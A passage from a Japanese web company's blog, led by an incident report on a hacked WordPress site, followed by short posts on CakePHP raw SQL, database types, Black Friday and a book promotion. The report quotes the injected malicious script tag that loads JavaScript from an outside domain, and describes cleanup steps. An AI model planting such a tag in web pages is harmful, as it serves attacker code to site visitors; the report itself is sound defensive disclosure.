2017.01.31 (Tue) Category : Blog Author :

サイト改ざん案件(報告)

最近サイト改ざんの対応案件が立て続けに入ったため、同じ被害に合わないために情報共有をします。

今回見つけたのは、以下のスクリプトをscriptタグで自動実行させるプログラムです。

wordpressのとあるページに埋め込まれていました。

”js.trafficanalytics.online/js/js.js”

 

侵入手口から推測すると

  1. wordpressのアカウント奪取
  2. FTPアカウント奪取
  3. DBアカウント奪取
  4. SSHアカウント奪取
  5. ミドルウェアのセキュリティホールをつく

これらのうちどこかのアカウント、セキュリティホールを利用してログイン、もしくはスクリプトを実行しているのではないかと思われます。

 

症状

wordpressのとあるページに

<script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script>

というコードが埋め込まれます。
同じコードが同じ場所に連続で埋め込まれていました。

連続で埋め込まれている(規則性がある)というところを見るとなんらかのプログラムされたものによって書き込まれていることが推測されます。
人為的な改ざんではないと考えられます。

さらに、wordpressでは、ログインページからログインし、記事やページを編集した場合はリビジョンを付けて世代管理されます。
世代管理されている状態をみるとその内容は3年前に変更されたということになっていました。

まずは、前の正しい状態に戻しました。

数時間後。。。

またもや改ざんされていました。
今度は、過去のリビジョンもすべて改ざん対象となっていました。
しかも日付は変更されていません。

このことから、直接DBに書き込んだことがわかります。

ということで、DBにログインしてユーザ情報を見てみたところ
すべてのユーザがパスワード無しでアクセスできる状態となっていました。

この設定をちゃんとし、
もちろん既存のユーザはすべて削除し、新規に追加。

パスワード設定しなおしました。

ここで解決ではありません。

どうやってDBにユーザを作成したのか。
そこが問題です。

ということは、
ミドルウェアのセキュリティホールが怪しい。

さらに、apacheのerror.logが参照できたので覗いてみるとmod_wsgiに対してかなりの数の攻撃がありました。おおよそここが原因ではないかと考えます。
普通にapache運用しているとmod_swgiなんて入れないんですがどうやらそこのレンタルサーバーやさんのコントロールパネルがphthonで動作するらしくそのために入っているっぽいです(推測)

とりあえずなんとなく原因がわかったのですが、
また攻撃されるかもしれません。

できる対応とすれば、残りは、FTPのパスワード変更です。
SSHもあればパスワード変更。

それでも改ざんされるようであれば、セキュリティホールを突かれているとしか考えられないので、おおよそmod_wsgiであ廊下と思います。
こうなればサーバー事業者に相談するしか方法はありません。

調査依頼ありましたら、ご相談に応じます。


2016.12.16 (Fri) Category : Blog Author :

cakephp3 SQLを直接入力し実行するには

SQL
データベースを実行するやり方は、色々存在します。その中には、直接SQLのコードを入力し実行するというやり方もあります。やはり、内容が複雑であればあるほどややこしくなり、直接SQLを入力したくなる時がありますよね。

ということで、やり方は以下の通りです。

use Cake\Datasource\ConnectionManager;
$sql = 'SELECT * FROM hoge WHERE hoge=1';
   
$connection = ConnectionManager::get('default');
$results = $connection->execute($sql)->fetchAll('assoc');

 


おまけですが、Cakephp2でも直接SQLを入力することができるみたいです。ですが全く記述の仕方が異なりました。

$this->Timelog->query('SELECT * FROM hoge WHERE hoge=1');

え、うそ
これだけ?( ゚Д゚)

 

実際、cakephp2の方では上記のコードを使用した動作確認をしていないため、上記のコードで動く確証はないのですが、cakephp3とcakephp2とではまったく仕様が違うなと、たびたび実感する私です
(´・ω・`)

2016.11.25 (Fri) Category : Blog,SQL,technology Author :

データベースの種類

DB
データベースにはさまざまな種類があります。
リレーショナル型データベース(RDBMS)

階層型データベース(HDB)

ネットワーク型データベース(NDB)

キー・バリュー型データストア(KVS)

カラム型データベース

 


そして、よく使用されるデータベースはRDBMSです。

RDBMSのソフトウェアの種類

  • MySQL
  • PostgeSQL
  • Microsoft SQL Server
  • Oracle DB
  • Informix
  • DB2

 

オープンソース:「MySQL」「PostgeSQL」


 

*RDBMSの特徴*

RDBMSはSQLを使用します。

SQLは、ISOで言語仕様の標準化ができているため、基本的なSQLを覚えておけば各種のRDBMSを扱うことができます。

※ただし、ベンダーごとに独自実装されている仕様もあります

 

 

2016.11.24 (Thu) Category : Blog Author :

BLACK FRIDAYブームの予感

BLACK FRIDAY

なんかここ最近みかけるようになった「ブラックフライデー」。違和感がありすぎる。2月の恵方巻きはまだ日本の文化を日本中に広めたのはよいとして、これは何?と思って調べてみました。

続きを読む »

2016.11.18 (Fri) Category : Blog,LINE,News, Author :

ネットには神様がいる 「ネットは票にならない」が覆った日 -山田太郎 (著)

告知忘れてました。昨日が発売日でした。。。本が発売されました。暇神様が表紙を飾った記念すべき著書がAmazonだけでなく一般書店でも買えるんです!買ってください。お願いします!

買ってくれた人には、ラインスタンププレゼントするかも!?07


ネットには神様がいる 「ネットは票にならない」が覆った日 単行本(ソフトカバー) – 2016/11/17 山田太郎 (著)

 

マサオ←暇神様のイラスト著者です!

 

LINEスタンプもあるよ。ストアはこちら。
暇神様

1 2 3 4 5 6 68
%d人のブロガーが「いいね」をつけました。